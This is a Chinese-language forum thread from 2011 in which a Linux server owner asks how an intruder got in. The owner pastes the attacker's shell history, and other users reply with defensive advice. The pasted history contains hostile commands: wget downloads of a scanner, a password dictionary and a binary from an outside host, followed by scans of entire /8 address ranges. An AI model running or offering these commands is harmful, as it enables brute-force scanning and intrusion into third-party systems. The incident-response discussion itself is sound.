免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
123下一页
最近访问板块 发新帖
查看: 9079 | 回复: 24
打印 上一主题 下一主题

linux被黑,请高手支招。 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2011-03-30 13:17 |只看该作者 |倒序浏览
我一台服务器被黑,关掉了ssh端口,还是被建立用户。扫描外网。请高手们帮我支招,不知道,是从何进来的?root密码也设置的很复杂。

执行了这些命令w
exit
cd /var/" "/si/res
ls
cd /home
ls
cd htpp
ls
cd httpd/
ls
cd /var/" "
cd /var/" "
ls
mkdir /var/" " ; cd /var/" " ; wget  http://rip-is-my.name/rip/sipscan7.1.tgz ; tar zxvf sipscan7.1.tgz ; cd sipscan7.1 ; ./install ; rm -rf dictionar ; wget  http://rip-is-my.name/rip/no.txt ; mv no.txt dictionar ; chmod +x dictionar ;
screen
apt-get
wget  http://rip-is-my.name/rip/screen ; chmod +x screen ; ./screen
top
ps x
screen -r
./screen
ps x
exit
./scan 78.0.0.0/8
./scan 79.0.0.0/8
cd /var/\ /sipscan7.1/results/
ls
cat *
rm -rf *
cd ..
screen -r
./screen -r
killall -9 screen
./screen -wipe
./screen
./screen
exit

scann.jpg (29.7 KB, 下载次数: 57)

scann.jpg

ssh.jpg (68.27 KB, 下载次数: 54)

ssh.jpg

论坛徽章:
0
2 [报告]
发表于 2011-03-30 13:40 |只看该作者
入侵的 又利用啥漏洞 获得root权限了

论坛徽章:
0
3 [报告]
发表于 2011-03-30 14:24 |只看该作者
应该是直接root进来的,楼主太不小心了……

论坛徽章:
0
4 [报告]
发表于 2011-03-30 14:38 |只看该作者
密码是复杂密码,上面有web服务,就是不知道从何进来的。帮忙支招一下。

论坛徽章:
0
5 [报告]
发表于 2011-03-30 14:42 |只看该作者
回复 4# zhanghuiwo


    多看看系统里的各个日志

    入侵方式太多,利用系统漏洞,服务漏洞,等等.....

论坛徽章:
0
6 [报告]
发表于 2011-03-30 20:13 |只看该作者
别是内部人干的

论坛徽章:
0
7 [报告]
发表于 2011-03-30 20:31 |只看该作者
应该不会吧?密码很少有人知道啊。我刚刚看了一下日志,老是有人扫描我的root密码,有可能是被破解了。不过有一点,我很奇怪,自上次被攻击过后,我关了22端口发布,怎么还能通过外网扫描22端口?且还被破解了?确实有点怪异。

论坛徽章:
0
8 [报告]
发表于 2011-03-31 09:22 |只看该作者
跟你闹着玩呢~

论坛徽章:
0
9 [报告]
发表于 2011-03-31 09:25 |只看该作者
LZ你以后连SSH要用证书不要用密码!!

论坛徽章:
0
10 [报告]
发表于 2011-03-31 10:27 |只看该作者
查了一系统,文件还是没有被修改过,find / -mtime -2.只有/var/‘ ’,此目录有修改,不过我删除了。密码已经修改。ssh端口也已经修改。今天看情况,比较稳定,先观察几天看看。
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP